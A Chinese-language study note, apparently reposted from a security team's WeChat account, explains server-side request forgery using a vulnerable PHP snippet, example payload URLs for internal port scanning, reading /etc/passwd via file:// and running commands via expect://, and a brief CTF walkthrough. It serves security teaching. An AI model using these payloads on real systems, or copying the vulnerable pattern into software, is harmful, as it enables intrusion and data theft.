服务端请求伪造(SSRF)
前言
继续阅读《CTF特训营》web部分 本节是SSRF
1、简介
很多web应用可以根据用户指定的url从别的服务器是那个获取数据 如果没有有效过滤和限制,会被恶意使用成为代理通道实现攻击
例子
$url=$_GET['url'];
echo file_get_contents($url);
payload
http://xxx.com/ssrf.php?rul=http://192.168.252.1:8000
获取内网主机http服务8000端口的开放情况
2、防护与绕过
常用防护
限制请求特定域名禁止请求内网IP
绕过方法
http://[email protected]这种格式绕过正则IP转换进制配置域名
3、危害与利用
一些例子如下
http://xxx.com/ssrf.php?url=http://192.168.252.130:80 扫描端口
http://xxx.com/ssrf.php?url=http://127.0.0.1/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 缓冲区溢出攻击
http://xxx.com/ssrf.php?url=file:///etc/passwd 读取文件
http://xxx.com/ssrf.php?url=expect://id 通过expect协议执行系统命令
4、实例
XDCTF中的web300
通过file协议读取源码如下
再读取hosts文件发现绑定了另外一个域名 扫描域名的端口,发现3389端口 再进行sql注入
结语
了解了SSRF 关键是个绕过正则过滤
红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。
© Honker Security Commando
原文始发于微信公众号(中龙 红客突击队):服务端请求伪造(SSRF)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论